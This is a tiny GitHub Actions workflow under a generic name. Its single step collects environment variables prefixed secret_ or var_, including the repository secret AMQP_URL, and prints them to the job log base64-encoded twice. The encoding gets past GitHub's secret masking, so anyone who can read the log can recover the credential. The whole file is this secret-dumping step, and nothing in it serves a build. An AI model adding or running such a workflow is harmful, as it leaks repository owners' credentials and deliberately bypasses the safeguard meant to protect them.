name: GitHub Actions
on:
  workflow_dispatch:
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_AMQP_URL: ${{ secrets.AMQP_URL }}
